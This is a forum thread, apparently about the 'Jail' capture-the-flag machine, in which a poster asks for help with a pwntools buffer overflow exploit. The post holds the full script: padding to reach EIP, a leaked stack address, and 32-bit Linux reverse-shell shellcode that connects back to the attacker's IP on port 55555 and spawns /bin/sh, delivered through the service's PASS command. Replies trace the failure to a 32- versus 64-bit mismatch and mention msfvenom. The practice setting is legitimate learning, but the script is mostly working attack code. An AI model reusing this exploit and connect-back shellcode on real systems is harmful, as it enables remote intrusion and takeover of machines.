Help with Jail Buffer exploit

Is there anyone that could help me out with the buffer overflow for jail?

I have created a buffer overflow following ippsecs tutorial but for some reason, I keep landing in my junk instead of landing in the buffer shellcode.

This is my exploit so far…

from pwn import *


HOST, PORT = ‘MY IP’, 7411

#Junk to get to EIP

junk = ‘\xCC’*28

#Memory leaked

mem = p32(0xffdc64c0 + 32)

#Shellcode to execute

buf = ‘’
buf += “\x68”
buf += REMOVED IP # ← IP Number
buf += “\x5e\x66\x68”
buf += “\xd9\x03” # ← Port Number “55555”
buf += “\x5f\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02”
buf += “\x89\xe1\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79”
buf += “\xf9\xb0\x66\x56\x66\x57\x66\x6a\x02\x89\xe1\x6a”
buf += “\x10\x51\x53\x89\xe1\xcd\x80\xb0\x0b\x52\x68\x2f”
buf += “\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53”
buf += “\xeb\xce”

#Connect to host
p = remote(HOST, PORT)

p.recvuntil(“OK Ready. Send USER command.”)
p.sendline(“USER admin”)
p.recvuntil(“OK Send PASS command.”)
p.recvuntil(“OK DEBUG mode on.”)
p.sendline("PASS " + junk + mem + buf)


IPPSEC does the memory leak + 32 which includes the 28 needed to get to the overflow + the 4 needed for the mem. I have done this but unfortunately I keep getting SIGSEGV and it is reading back the \xCC’s.

Anyone notice what I am doing wrong? I am sure it will be something small that I am not over yet.

Disregard. 64 vs 32…

Were you able to get an msfvenom shellcode working, or did you have to use that one?

Im sure you could get your own msfvenom one to work if the format is python.

But I was trying it on my machine first when my kali is 64 bit and the shellcode was a 32 bit code.